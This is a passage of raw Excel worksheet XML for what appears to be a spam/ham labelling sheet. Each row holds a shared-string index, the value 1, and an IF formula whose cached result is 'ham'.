        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1170" t="s">
        <v>21</v>
      </c>
      <c r="B1170">
        <v>1</v>
      </c>
      <c r="C1170" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1171" t="s">
        <v>841</v>
      </c>
      <c r="B1171">
        <v>1</v>
      </c>
      <c r="C1171" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1172" t="s">
        <v>21</v>
      </c>
      <c r="B1172">
        <v>1</v>
      </c>
      <c r="C1172" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1173" t="s">
        <v>842</v>
      </c>
      <c r="B1173">
        <v>1</v>
      </c>
      <c r="C1173" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1174" t="s">
        <v>843</v>
      </c>
      <c r="B1174">
        <v>1</v>
      </c>
      <c r="C1174" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1175" t="s">
        <v>21</v>
      </c>
      <c r="B1175">
        <v>1</v>
      </c>
      <c r="C1175" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1176" t="s">
        <v>844</v>
      </c>
      <c r="B1176">
        <v>1</v>
      </c>
      <c r="C1176" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1177" t="s">
        <v>845</v>
      </c>
      <c r="B1177">
        <v>1</v>
      </c>
      <c r="C1177" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1178" t="s">
        <v>846</v>
      </c>
      <c r="B1178">
        <v>1</v>
      </c>
      <c r="C1178" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1179" t="s">
        <v>21</v>
      </c>
      <c r="B1179">
        <v>1</v>
      </c>
      <c r="C1179" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1180" t="s">
        <v>847</v>
      </c>
      <c r="B1180">
        <v>1</v>
      </c>
      <c r="C1180" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1181" t="s">
        <v>848</v>
      </c>
      <c r="B1181">
        <v>1</v>
      </c>
      <c r="C1181" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1182" t="s">
        <v>849</v>
      </c>
      <c r="B1182">
        <v>1</v>
      </c>
      <c r="C1182" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1183" t="s">
        <v>850</v>
      </c>
      <c r="B1183">
        <v>1</v>
      </c>
      <c r="C1183" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1184" t="s">
        <v>851</v>
      </c>
      <c r="B1184">
        <v>1</v>
      </c>
      <c r="C1184" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1185" t="s">
        <v>852</v>
      </c>
      <c r="B1185">
        <v>1</v>
      </c>
      <c r="C1185" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1186" t="s">
        <v>853</v>
      </c>
      <c r="B1186">
        <v>1</v>
      </c>
      <c r="C1186" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1187" t="s">
        <v>21</v>
      </c>
      <c r="B1187">
        <v>1</v>
      </c>
      <c r="C1187" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1188" t="s">
        <v>691</v>
      </c>
      <c r="B1188">
        <v>1</v>
      </c>
      <c r="C1188" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1189" t="s">
        <v>854</v>
      </c>
      <c r="B1189">
        <v>1</v>
      </c>
      <c r="C1189" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1190" t="s">
        <v>855</v>
      </c>
      <c r="B1190">
        <v>1</v>
      </c>
      <c r="C1190" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1191" t="s">
        <v>856</v>
      </c>
      <c r="B1191">
        <v>1</v>
      </c>
      <c r="C1191" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1192" t="s">
        <v>21</v>
      </c>
      <c r="B1192">
        <v>1</v>
      </c>
      <c r="C1192" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1193" t="s">
        <v>857</v>
      </c>
      <c r="B1193">
        <v>1</v>
      </c>
      <c r="C1193" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1194" t="s">
        <v>858</v>
      </c>
      <c r="B1194">
        <v>1</v>
      </c>
      <c r="C1194" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1195" t="s">
        <v>859</v>
      </c>
      <c r="B1195">
        <v>1</v>
      </c>
      <c r="C1195" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1196" t="s">
        <v>860</v>
      </c>
      <c r="B1196">
        <v>1</v>
      </c>
      <c r="C1196" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1197" t="s">
        <v>861</v>
      </c>
      <c r="B1197">
        <v>1</v>
      </c>
      <c r="C1197" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1198" t="s">
        <v>862</v>
      </c>
      <c r="B1198">
        <v>1</v>
      </c>
      <c r="C1198" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1199" t="s">
        <v>863</v>
      </c>
      <c r="B1199">
        <v>1</v>
      </c>
      <c r="C1199" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1200" t="s">
        <v>864</v>
      </c>
      <c r="B1200">
        <v>1</v>
      </c>
      <c r="C1200" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1201" t="s">
        <v>21</v>
      </c>
      <c r="B1201">
        <v>1</v>
      </c>
      <c r="C1201" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1202" t="s">
        <v>865</v>
      </c>
      <c r="B1202">
        <v>1</v>
      </c>
      <c r="C1202" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1203" t="s">
        <v>866</v>
      </c>
      <c r="B1203">
        <v>1</v>
      </c>
      <c r="C1203" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1204" t="s">
        <v>867</v>
      </c>
      <c r="B1204">
        <v>1</v>
      </c>
      <c r="C1204" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1205" t="s">
        <v>866</v>
      </c>
      <c r="B1205">
        <v>1</v>
      </c>
      <c r="C1205" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1206" t="s">
        <v>868</v>
      </c>
      <c r="B1206">
        <v>1</v>
      </c>
      <c r="C1206" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1207" t="s">
        <v>869</v>
      </c>
      <c r="B1207">
        <v>1</v>
      </c>
      <c r="C1207" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1208" t="s">
        <v>870</v>
      </c>
      <c r="B1208">
        <v>1</v>
      </c>
      <c r="C1208" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1209" t="s">
        <v>871</v>
      </c>
      <c r="B1209">
        <v>1</v>
      </c>
      <c r="C1209" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1210" t="s">
        <v>21</v>
      </c>
      <c r="B1210">
        <v>1</v>
      </c>
      <c r="C1210" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1211" t="s">
        <v>21</v>
      </c>
      <c r="B1211">
        <v>1</v>
      </c>
      <c r="C1211" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1212" t="s">
        <v>872</v>
      </c>
      <c r="B1212">
        <v>1</v>
      </c>
      <c r="C1212" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1213" t="s">
        <v>873</v>
      </c>
      <c r="B1213">
        <v>1</v>
      </c>
      <c r="C1213" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1214" t="s">
        <v>874</v>
      </c>
      <c r="B1214">
        <v>1</v>
      </c>
      <c r="C1214" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1215" t="s">
        <v>875</v>
      </c>
      <c r="B1215">
        <v>1</v>
      </c>
      <c r="C1215" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1216" t="s">
        <v>876</v>
      </c>
      <c r="B1216">
        <v>1</v>
      </c>
      <c r="C1216" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1217" t="s">
        <v>877</v>
      </c>
      <c r="B1217">
        <v>1</v>
      </c>
      <c r="C1217" t="str">
        <f t="shared" si="18"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1218" t="s">
        <v>878</v>
      </c>
      <c r="B1218">
        <v>1</v>
      </c>
      <c r="C1218" t="str">
        <f t="shared" ref="C1218:C1281" si="19">IF(B1218="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1219" t="s">
        <v>879</v>
      </c>
      <c r="B1219">
        <v>1</v>
      </c>
      <c r="C1219" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1220" t="s">
        <v>21</v>
      </c>
      <c r="B1220">
        <v>1</v>
      </c>
      <c r="C1220" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1221" t="s">
        <v>880</v>
      </c>
      <c r="B1221">
        <v>1</v>
      </c>
      <c r="C1221" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1222" t="s">
        <v>881</v>
      </c>
      <c r="B1222">
        <v>1</v>
      </c>
      <c r="C1222" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1223" t="s">
        <v>882</v>
      </c>
      <c r="B1223">
        <v>1</v>
      </c>
      <c r="C1223" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1224" t="s">
        <v>883</v>
      </c>
      <c r="B1224">
        <v>1</v>
      </c>
      <c r="C1224" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1225" t="s">
        <v>884</v>
      </c>
      <c r="B1225">
        <v>1</v>
      </c>
      <c r="C1225" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1226" t="s">
        <v>21</v>
      </c>
      <c r="B1226">
        <v>1</v>
      </c>
      <c r="C1226" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1227" t="s">
        <v>885</v>
      </c>
      <c r="B1227">
        <v>1</v>
      </c>
      <c r="C1227" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1228" t="s">
        <v>886</v>
      </c>
      <c r="B1228">
        <v>1</v>
      </c>
      <c r="C1228" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1229" t="s">
        <v>887</v>
      </c>
      <c r="B1229">
        <v>1</v>
      </c>
      <c r="C1229" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1230" t="s">
        <v>888</v>
      </c>
      <c r="B1230">
        <v>1</v>
      </c>
      <c r="C1230" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1231" t="s">
        <v>21</v>
      </c>
      <c r="B1231">
        <v>1</v>
      </c>
      <c r="C1231" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1232" t="s">
        <v>889</v>
      </c>
      <c r="B1232">
        <v>1</v>
      </c>
      <c r="C1232" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1233" t="s">
        <v>890</v>
      </c>
      <c r="B1233">
        <v>1</v>
      </c>
      <c r="C1233" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1234" t="s">
        <v>891</v>
      </c>
      <c r="B1234">
        <v>1</v>
      </c>
      <c r="C1234" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1235" t="s">
        <v>21</v>
      </c>
      <c r="B1235">
        <v>1</v>
      </c>
      <c r="C1235" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1236" t="s">
        <v>21</v>
      </c>
      <c r="B1236">
        <v>1</v>
      </c>
      <c r="C1236" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1237" t="s">
        <v>21</v>
      </c>
      <c r="B1237">
        <v>1</v>
      </c>
      <c r="C1237" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1238" t="s">
        <v>892</v>
      </c>
      <c r="B1238">
        <v>1</v>
      </c>
      <c r="C1238" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1239" t="s">
        <v>892</v>
      </c>
      <c r="B1239">
        <v>1</v>
      </c>
      <c r="C1239" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1240" t="s">
        <v>893</v>
      </c>
      <c r="B1240">
        <v>1</v>
      </c>
      <c r="C1240" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1241" t="s">
        <v>894</v>
      </c>
      <c r="B1241">
        <v>1</v>
      </c>
      <c r="C1241" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1242" t="s">
        <v>895</v>
      </c>
      <c r="B1242">
        <v>1</v>
      </c>
      <c r="C1242" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1243" t="s">
        <v>896</v>
      </c>
      <c r="B1243">
        <v>1</v>
      </c>
      <c r="C1243" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1244" t="s">
        <v>897</v>
      </c>
      <c r="B1244">
        <v>1</v>
      </c>
      <c r="C1244" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1245" t="s">
        <v>898</v>
      </c>
      <c r="B1245">
        <v>1</v>
      </c>
      <c r="C1245" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1246" t="s">
        <v>899</v>
      </c>
      <c r="B1246">
        <v>1</v>
      </c>
      <c r="C1246" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1247" t="s">
        <v>900</v>
      </c>
      <c r="B1247">
        <v>1</v>
      </c>
      <c r="C1247" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1248" t="s">
        <v>901</v>
      </c>
      <c r="B1248">
        <v>1</v>
      </c>
      <c r="C1248" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1249" t="s">
        <v>902</v>
      </c>
      <c r="B1249">
        <v>1</v>
      </c>
      <c r="C1249" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1250" t="s">
        <v>21</v>
      </c>
      <c r="B1250">
        <v>1</v>
      </c>
      <c r="C1250" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1251" t="s">
        <v>903</v>
      </c>
      <c r="B1251">
        <v>1</v>
      </c>
      <c r="C1251" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1252" t="s">
        <v>21</v>
      </c>
      <c r="B1252">
        <v>1</v>
      </c>
      <c r="C1252" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1253" t="s">
        <v>21</v>
      </c>
      <c r="B1253">
        <v>1</v>
      </c>
      <c r="C1253" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1254" t="s">
        <v>904</v>
      </c>
      <c r="B1254">
        <v>1</v>
      </c>
      <c r="C1254" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1255" t="s">
        <v>905</v>
      </c>
      <c r="B1255">
        <v>1</v>
      </c>
      <c r="C1255" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1256" t="s">
        <v>906</v>
      </c>
      <c r="B1256">
        <v>1</v>
      </c>
      <c r="C1256" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1257" t="s">
        <v>21</v>
      </c>
      <c r="B1257">
        <v>1</v>
      </c>
      <c r="C1257" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1258" t="s">
        <v>907</v>
      </c>
      <c r="B1258">
        <v>1</v>
      </c>
      <c r="C1258" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1259" t="s">
        <v>908</v>
      </c>
      <c r="B1259">
        <v>1</v>
      </c>
      <c r="C1259" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1260" t="s">
        <v>909</v>
      </c>
      <c r="B1260">
        <v>1</v>
      </c>
      <c r="C1260" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1261" t="s">
        <v>909</v>
      </c>
      <c r="B1261">
        <v>1</v>
      </c>
      <c r="C1261" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1262" t="s">
        <v>910</v>
      </c>
      <c r="B1262">
        <v>1</v>
      </c>
      <c r="C1262" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1263" t="s">
        <v>911</v>
      </c>
      <c r="B1263">
        <v>1</v>
      </c>
      <c r="C1263" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1264" t="s">
        <v>907</v>
      </c>
      <c r="B1264">
        <v>1</v>
      </c>
      <c r="C1264" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1265" t="s">
        <v>912</v>
      </c>
      <c r="B1265">
        <v>1</v>
      </c>
      <c r="C1265" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1266" t="s">
        <v>634</v>
      </c>
      <c r="B1266">
        <v>1</v>
      </c>
      <c r="C1266" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1267" t="s">
        <v>913</v>
      </c>
      <c r="B1267">
        <v>1</v>
      </c>
      <c r="C1267" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1268" t="s">
        <v>914</v>
      </c>
      <c r="B1268">
        <v>1</v>
      </c>
      <c r="C1268" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1269" t="s">
        <v>915</v>
      </c>
      <c r="B1269">
        <v>1</v>
      </c>
      <c r="C1269" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1270" t="s">
        <v>21</v>
      </c>
      <c r="B1270">
        <v>1</v>
      </c>
      <c r="C1270" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1271" t="s">
        <v>21</v>
      </c>
      <c r="B1271">
        <v>1</v>
      </c>
      <c r="C1271" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1272" t="s">
        <v>916</v>
      </c>
      <c r="B1272">
        <v>1</v>
      </c>
      <c r="C1272" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1273" t="s">
        <v>868</v>
      </c>
      <c r="B1273">
        <v>1</v>
      </c>
      <c r="C1273" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1274" t="s">
        <v>21</v>
      </c>
      <c r="B1274">
        <v>1</v>
      </c>
      <c r="C1274" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1275" t="s">
        <v>103</v>
      </c>
      <c r="B1275">
        <v>1</v>
      </c>
      <c r="C1275" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1276" t="s">
        <v>913</v>
      </c>
      <c r="B1276">
        <v>1</v>
      </c>
      <c r="C1276" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1277" t="s">
        <v>917</v>
      </c>
      <c r="B1277">
        <v>1</v>
      </c>
      <c r="C1277" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1278" t="s">
        <v>918</v>
      </c>
      <c r="B1278">
        <v>1</v>
      </c>
      <c r="C1278" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1279" t="s">
        <v>919</v>
      </c>
      <c r="B1279">
        <v>1</v>
      </c>
      <c r="C1279" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1280" t="s">
        <v>920</v>
      </c>
      <c r="B1280">
        <v>1</v>
      </c>
      <c r="C1280" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1281" t="s">
        <v>21</v>
      </c>
      <c r="B1281">
        <v>1</v>
      </c>
      <c r="C1281" t="str">
        <f t="shared" si="19"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1282" t="s">
        <v>921</v>
      </c>
      <c r="B1282">
        <v>1</v>
      </c>
      <c r="C1282" t="str">
        <f t="shared" ref="C1282:C1345" si="20">IF(B1282="1", "spam", "ham")</f>
        <v>ham</v>
